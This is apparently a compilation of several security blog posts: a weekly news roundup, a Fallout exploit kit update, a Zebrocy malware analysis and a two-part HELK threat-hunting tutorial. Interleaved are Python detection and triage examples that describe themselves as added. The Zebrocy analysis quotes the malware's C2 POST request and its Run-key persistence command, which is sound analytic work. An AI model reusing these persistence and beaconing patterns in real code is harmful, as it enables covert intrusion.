A week in security (January 14 – 20)

Last week on the Malwarebytes Labs blog, we took a look at how the government shutdown is influencing cybersecurity jobs, Advanced Persistent Threats group APT10, the comeback of Fallout EK, the hosting of malicious sites on legitimate servers, and the Collection 1 data breach.

  • New Zealand-based cryptocurrency exchange Cryptopia has gone offline after suffering a security breach, which resulted in significant losses. Cryptopia has notified and involved relevant government agencies, including the New Zealand police and the High-Tech Crimes Unit. (Source: Coindesk)
  • A former employee of a British company pleaded guilty to one count of gaining unauthorised access to a network with intent to commit further offences, and one count of committing unauthorised acts with the intent to impair the operation of a computer within a network. The employee was ordered to pay £20,000 compensation. (Source: Leamington Observer)
  • A California judge has ruled that American cops can’t force people to unlock a mobile phone with their face or finger. The ruling further protects people’s private lives from government searches, and is being hailed as a potentially landmark decision. (Source: Forbes)
  • The Oregon State Department of Administrative Services’ (DAS) Office of the State Chief Information Officer overpaid for services by between $400 million and $1.6 billion during the 2015 to 2017 timeframe, according to an audit by the Oregon Secretary of State Audit Division that looked at $8 billion of spending. (Source: CioDive)
  • The recent Windows security patch CVE-2019-0543 has introduced a breaking change for a PowerShell remoting scenario. It is a narrowly-scoped scenario that should have low impact for most users, as the breaking change only affects local loopback remoting. (Source: PowerShell Team Blog)
  • The Iceman cometh, his smartwatch told the cops: Hitman jailed after gizmo links him to Brit gangland slayings. Avid runner and hitman Mark Fellows was this week found guilty of murder after being grassed up by his Garmin watch. (Source: The Register)
  • Security flaws were discovered in ThreadX, a real-time operating system (RTOS) developed by Express Logic. The vendor claims on their website that ThreadX has over 6.2 billion deployments, making it one of the most popular pieces of software powering Wi-Fi chips. (Source: BleepingComputer)
  • Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. The attacker can use Telegram to communicate with the malware and send HTTPS-protected instructions. (Source: SC Media)
  • A Fortnite security flaw could have exposed players’ accounts. Security researchers found vulnerabilities on Epic’s site that could have let hackers access accounts. They were able to listen to Fortnite squad members speaking with each other and could have bought V-Bucks virtual currency using players’ stored credit card details. (Source: Engadget)
  • Pranks and challenges have always been popular on YouTube, but now the Google-owned company has set stricter guidelines for such content. A new YouTube support page provides details for a ban on pranks and challenges that cause immediate or lasting physical or emotional harm. (Source: ArsTechnica)

Stay safe, everyone!

Improved Fallout EK comes back after short hiatus

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:

  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • Powershell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64 encoded Powershell command calls out the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.

[Edit: 2019-01-18] This technique is used to bypass the Antimalware Scan Interface (AMSI) in Windows 10, which offers additional protection at the last stage of an attack, as described by @nao_sec.

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise

185.56.233[.]186,advancedfeed[.]pro,HookAds Campaign

51.15.35[.]154,payformyattention[.]site,Fallout EK

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed by the opening of an identically named decoy Word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.


Almost all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.
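For triage of a suspect shortcut attachment like the one described above, the following added example (not code from the original report) checks the Shell Link header, flags an abnormal file size, and locates and unwraps long base64 runs to report their offsets and what they decode to. The 64 KB size threshold, the 256-character minimum run length, and the sample bytes are assumptions constructed for illustration.

```python
import base64
import re

# First 20 bytes of every Shell Link file: HeaderSize 0x4C plus the LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
SIZE_LIMIT = 64 * 1024  # assumption: ordinary shortcuts are only a few KB
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")  # assumption: minimum run length
MAGICS = [(b"MZ", "PE executable"), (b"PK\x03\x04", "ZIP/OOXML document")]
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def decode_run(run):
    """Base64-decode a carved run, tolerating missing or partial padding."""
    core = run.rstrip(b"=")
    if len(core) % 4 == 1:  # one dangling character cannot encode a byte
        core = core[:-1]
    return base64.b64decode(core + b"=" * (-len(core) % 4))


def classify(blob):
    """Name decoded content by its magic bytes, else call it text or unknown."""
    for magic, name in MAGICS:
        if blob.startswith(magic):
            return name
    if blob and all(b in PRINTABLE for b in blob[:512]):
        return "text"  # possibly a further script layer worth unwrapping
    return "unknown"


def find_payloads(data, depth=0, max_depth=2):
    """Return (depth, offset, length, kind) per base64 run, recursing into text."""
    found = []
    for m in B64_RUN.finditer(data):
        blob = decode_run(m.group(0))
        kind = classify(blob)
        found.append((depth, m.start(), len(m.group(0)), kind))
        if kind == "text" and depth + 1 < max_depth:
            found.extend(find_payloads(blob, depth + 1, max_depth))
    return found


def triage_lnk(data, size_limit=SIZE_LIMIT):
    """Summarise why a shortcut file deserves a closer look."""
    payloads = find_payloads(data)
    return {
        "is_lnk": data.startswith(LNK_MAGIC),
        "size": len(data),
        "oversized": len(data) > size_limit,
        "payloads": payloads,
        "suspicious": len(data) > size_limit or bool(payloads),
    }


def build_sample():
    """Constructed stand-in for a layered LNK; holds no real script or malware."""
    exe = base64.b64encode(b"MZ" + b"\x90" * 70000)
    doc = base64.b64encode(b"PK\x03\x04" + b"\x00" * 300)
    inner = b'layer2 exe="' + exe + b'" doc="' + doc + b'"'
    return LNK_MAGIC + b"\x00" * 80 + b'cmd="' + base64.b64encode(inner) + b'"'


if __name__ == "__main__":
    report = triage_lnk(build_sample())
    print(report["is_lnk"], report["size"], report["oversized"])
    for depth, offset, length, kind in report["payloads"]:
        print(f"layer {depth}: offset {offset}, {length} base64 chars -> {kind}")
```

A run that directly follows other alphanumeric bytes can be carved misaligned, so treat an "unknown" result as a prompt for manual review rather than a clean verdict.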

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”
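The behaviours above translate into a simple correlation hunt, shown here as an added example that is not part of the original report. It tags a POST with the default Go user-agent to a bare-IP .php endpoint, and process command lines that launch or persist an executable under Identities\{GUID}; because the Go user-agent alone is common in legitimate tooling, only hosts showing both a network and a process tag are treated as high confidence. The event field names, host names, IP addresses and GUID are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

GO_DEFAULT_UA = "Go-http-client/1.1"
RUN_KEY = re.compile(
    r'reg(\.exe)?\s+add\s+"?(HKCU|HKEY_CURRENT_USER)'
    r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b', re.I)
IDENTITIES_EXE = re.compile(
    r'\\appdata\\(local\\)?Identities\\\{[0-9a-f-]{36}\}\\[^\\\s"]+\.exe', re.I)


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def http_tags(ev):
    """Tag a proxy record: POST + default Go UA + bare-IP host + .php path."""
    url = urlsplit(ev["url"])
    if (ev["method"] == "POST" and ev["user_agent"] == GO_DEFAULT_UA
            and is_ip_literal(url.hostname) and url.path.lower().endswith(".php")):
        return ["net:go-ua-post-to-ip"]
    return []


def process_tags(ev):
    """Tag a process-creation record that touches an exe under Identities\\{GUID}."""
    cmd = ev["command_line"]
    if not IDENTITIES_EXE.search(cmd):
        return []
    if RUN_KEY.search(cmd):
        return ["proc:run-key-identities"]
    if cmd.lower().lstrip().startswith("cmd /c"):
        return ["proc:cmd-launch-identities"]
    return []


def hunt(http_events, proc_events):
    """Return {host: sorted tags} for every host with at least one tag."""
    tags = {}
    for ev in http_events:
        tags.setdefault(ev["host"], set()).update(http_tags(ev))
    for ev in proc_events:
        tags.setdefault(ev["host"], set()).update(process_tags(ev))
    return {h: sorted(t) for h, t in tags.items() if t}


def high_confidence(findings):
    """Hosts that show both the network behaviour and a process behaviour."""
    return sorted(h for h, t in findings.items()
                  if any(x.startswith("net:") for x in t)
                  and any(x.startswith("proc:") for x in t))


# Constructed sample records (documentation IP ranges, made-up GUID and hosts).
DROP = r"c:\users\user1\appdata\local\Identities\{11111111-2222-3333-4444-555555555555}\w32srv.exe"
HTTP_EVENTS = [
    {"host": "WS01", "method": "POST", "user_agent": GO_DEFAULT_UA,
     "url": "http://203.0.113.10/technet-support/library/online-service-description.php?id_name=345XXXD5"},
    {"host": "BUILD01", "method": "GET", "user_agent": GO_DEFAULT_UA,
     "url": "https://proxy.golang.org/github.com/example/mod/@v/list"},
    {"host": "WS02", "method": "POST", "user_agent": "Mozilla/5.0",
     "url": "http://203.0.113.10/index.php"},
    {"host": "WS04", "method": "POST", "user_agent": GO_DEFAULT_UA,
     "url": "http://198.51.100.7/api/upload.php"},
]
PROC_EVENTS = [
    {"host": "WS01", "command_line": "cmd /C " + DROP},
    {"host": "WS01", "command_line":
        r'cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d '
        + DROP + ' /f"'},
    {"host": "WS03", "command_line":
        r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Sync /d "C:\Program Files\Sync\sync.exe" /f'},
]

if __name__ == "__main__":
    results = hunt(HTTP_EVENTS, PROC_EVENTS)
    for host, host_tags in results.items():
        print(host, host_tags)
    print("high confidence:", high_confidence(results))
```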

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7]
Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly, the final payload reverts to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list.


Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom


Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.


Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.


Go downloader



File – paths and names
Embassy Note No.259.docx.lnk

toolsmith #132 – The HELK vs APTSimulator – Part 2

Continuing where we left off in The HELK vs APTSimulator - Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks as part of its lab offering. These capabilities scale well beyond a standard ELK stack; this really is where parallel computing and significantly improved processing and analytics truly take hold. This is a great way to introduce yourself to these technologies, all on a unified platform.

Let me break these down for you a little bit in case you haven't been exposed to these technologies yet. First and foremost, refer to @Cyb3rWard0g's wiki page on how he's designed it for his HELK implementation, as seen in Figure 1.
Figure 1: HELK Architecture
First, Apache Spark. For HELK, "Elasticsearch-hadoop provides native integration between Elasticsearch and Apache Spark, in the form of an RDD (Resilient Distributed Dataset) (or Pair RDD to be precise) that can read data from Elasticsearch." Per the Apache Spark FAQ, "Spark is a fast and general processing engine compatible with Hadoop data" to deliver "lightning-fast cluster computing."
Second, GraphFrames. From the GraphFrames overview, "GraphFrames is a package for Apache Spark which provides DataFrame-based Graphs. GraphFrames represent graphs: vertices (e.g., users) and edges (e.g., relationships between users). GraphFrames also provide powerful tools for running queries and standard graph algorithms. With GraphFrames, you can easily search for patterns within graphs, find important vertices, and more." 
Finally, Jupyter Notebooks to pull it all together.
From "The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more." Jupyter Notebooks provide a higher order of analyst/analytics capabilities; if you haven't dipped your toe in that water, this may be your first, best opportunity.
Let's take a look at using Jupyter Notebooks with the data populated to my Docker-based HELK instance as implemented in Part 1. I repopulated my HELK instance with new data from a different, bare metal Windows instance reporting to HELK with Winlogbeat, Sysmon enabled, and looking mighty compromised thanks to @cyb3rops's APTSimulator.
To make use of Jupyter Notebooks, you need your JUPYTER CURRENT TOKEN to access the Jupyter Notebook web interface. It was presented to you when your HELK installation completed, but you can easily retrieve it via sudo docker logs helk-analytics, then copy and paste the URL into your browser to connect for the first time with a token. It will look like this,
http://localhost:8880/?token=3f46301da4cd20011391327647000e8006ee3574cab0b163, as described in the Installation wiki. After browsing to the URL with said token, you can begin at http://localhost:8880/lab, where you should immediately proceed to the Check_Spark_Graphframes_Integrations.ipynb notebook. It's found in the hierarchy menu under training > jupyter_notebooks > getting_started. This notebook is essential to confirming you're ingesting data properly with HELK and that its integrations are fully functioning. Step through it one cell at a time with the play button, allowing each task to complete so as to avoid errors. Remember the above mentioned Resilient Distributed Dataset? This notebook will create a Spark RDD on top of Elasticsearch using the logs-endpoint-winevent-sysmon-* (Sysmon logs) index as source, and do the same thing with the logs-endpoint-winevent-security-* (Window Security Event logs) index as source, as seen in Figure 2.
Figure 2: Windows Security EVT Spark RDD
The notebook will also query your Windows security events via Spark SQL, then print the schema with:
df = spark.read.format("org.elasticsearch.spark.sql").load("logs-endpoint-winevent-security-*/doc")
df.printSchema()
The result should resemble Figure 3.
Figure 3: Schema
Assuming all matches with relative consistency in your experiment, let's move on to the Sysmon_ProcessCreate_Graph.ipynb notebook, found in training > jupyter_notebooks. This notebook will again call on the Elasticsearch Sysmon index and create vertices and edges dataframes, then create a graph produced with GraphFrame built from those same vertices and edges. Here's a little walk-through.
The v parameter (yes, for vertices) is populated with:
v = df.withColumn("id", df.process_guid).select("id","user_name","host_name","process_parent_name","process_name","action")
v = v.filter(v.action == "processcreate")
Showing the top three rows of that result set, with v.show(3,truncate=False), appears as Figure 4 in the notebook, with the data from my APTSimulator "victim" system, N2KND-PC.
Figure 4: WTF, Florian :-)
The epic, uber threat hunter in me believes that APTSimulator created nslookup, 7z, and regedit as processes via cmd.exe. Genius, right? :-)
The e parameter (yes, for edges) is populated with:
e = df.filter(df.action == "processcreate").selectExpr("process_parent_guid as src","process_guid as dst").withColumn("relationship", lit("spawned"))
Showing the top three rows of that result set, with e.show(3,truncate=False), produces the source and destination process IDs as it pertains to the spawning relationship.
Now, create a graph from the vertices and edges dataframes as defined in the v & e parameters with g = GraphFrame(v, e). Let's bring it home with a hunt for Process A spawning Process B AND Process B spawning Process C; the code needed and the result are seen from the notebook in Figure 5.
Figure 5: APTSimulator's happy spawn
Oh, yes, APTSimulator fully realized in a nice graph. Great example seen in cmd.exe spawning wscript.exe, which then spawns rundll32.exe. Or cmd.exe spawning powershell.exe and schtasks.exe.
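The A spawns B spawns C hunt described above can be reproduced without a Spark cluster. This added example (not code from the HELK notebook) builds the same vertex and edge relationships in plain Python from Sysmon ProcessCreate rows and returns every two-hop chain, then narrows to chains whose middle process is a script host. The GUID values, the event rows and the SCRIPT_HOSTS set are constructed assumptions; the field names follow the notebook's dataframe columns.

```python
from collections import defaultdict

# Assumption: middle processes worth surfacing first when reviewing chains.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def ev(guid, parent_guid, name, parent_name, action="processcreate"):
    """Build one constructed Sysmon row using the notebook's column names."""
    return {"process_guid": guid, "process_parent_guid": parent_guid,
            "process_name": name, "process_parent_name": parent_name,
            "host_name": "N2KND-PC", "user_name": "malman", "action": action}


# Constructed events. G0 (explorer.exe) has no create event of its own here.
EVENTS = [
    ev("G1", "G0", "cmd.exe", "explorer.exe"),
    ev("G2", "G1", "wscript.exe", "cmd.exe"),
    ev("G3", "G2", "rundll32.exe", "wscript.exe"),
    ev("G4", "G1", "powershell.exe", "cmd.exe"),
    ev("G5", "G1", "schtasks.exe", "cmd.exe"),
    ev("G6", "G1", "nslookup.exe", "cmd.exe"),
    ev("G4", "G1", "powershell.exe", "cmd.exe", action="networkconnect"),
]


def build_graph(events):
    """Return (names, children): vertex labels and parent -> child edges.

    Keys are process GUIDs rather than PIDs, since PIDs are reused over time.
    """
    names = {}
    children = defaultdict(list)
    for e in events:
        if e["action"] != "processcreate":
            continue  # same filter the notebook applies to v and e
        names[e["process_guid"]] = e["process_name"]
        # Parent may predate log collection: fall back to the name the child saw.
        names.setdefault(e["process_parent_guid"], e["process_parent_name"])
        children[e["process_parent_guid"]].append(e["process_guid"])
    return names, children


def two_hop_chains(events):
    """All (A, B, C) name triples where A spawned B and B spawned C.

    GraphFrames expresses the same pattern as a motif query, for example
    g.find("(a)-[]->(b); (b)-[]->(c)").
    """
    names, children = build_graph(events)
    chains = []
    for a, kids in children.items():
        for b in kids:
            for c in children.get(b, []):  # .get avoids mutating the defaultdict
                chains.append((names[a], names[b], names[c]))
    return sorted(chains)


def script_host_chains(events):
    """Chains whose middle process is a script host, e.g. cmd > wscript > rundll32."""
    return [c for c in two_hop_chains(events) if c[1] in SCRIPT_HOSTS]


if __name__ == "__main__":
    for chain in two_hop_chains(EVENTS):
        print(" > ".join(chain))
    print("script-host chains:", script_host_chains(EVENTS))
```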
Need confirmation? Florian's CactusTorch JS dropper is detailed in Figure 6, specifically cmd.exe > wscript.exe > rundll32.exe.
Figure 6: APTSimulator source for CactusTorch
Still not convinced? How about APTSimulator's schtasks.bat, where APTSimulator kindly loads mimikatz with schtasks.exe for persistence, per Figure 7?
Figure 7: schtasks.bat
I certainly hope that the HELK's graph results matching nicely with APTSimulator source meets with your satisfaction.
The HELK vs APTSimulator ends with a glorious flourish; these two monsters in their field belong in every lab to practice red versus blue, attack and defend, compromise and detect. I haven't been this happy to be a practitioner in the defense against the dark arts in quite a while. My sincere thanks to Roberto and Florian for their great work on the HELK and APTSimulator. I can't suggest strongly enough how much you'll benefit from taking the time to run through Part 1 and 2 of The HELK vs APTSimulator for yourself. Both tools are well documented on their respective GitHubs; go now, get started, profit.
Cheers...until next time.

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone
  • cd HELK/
  • sudo ./ 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you; if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["","",""]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOC's response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
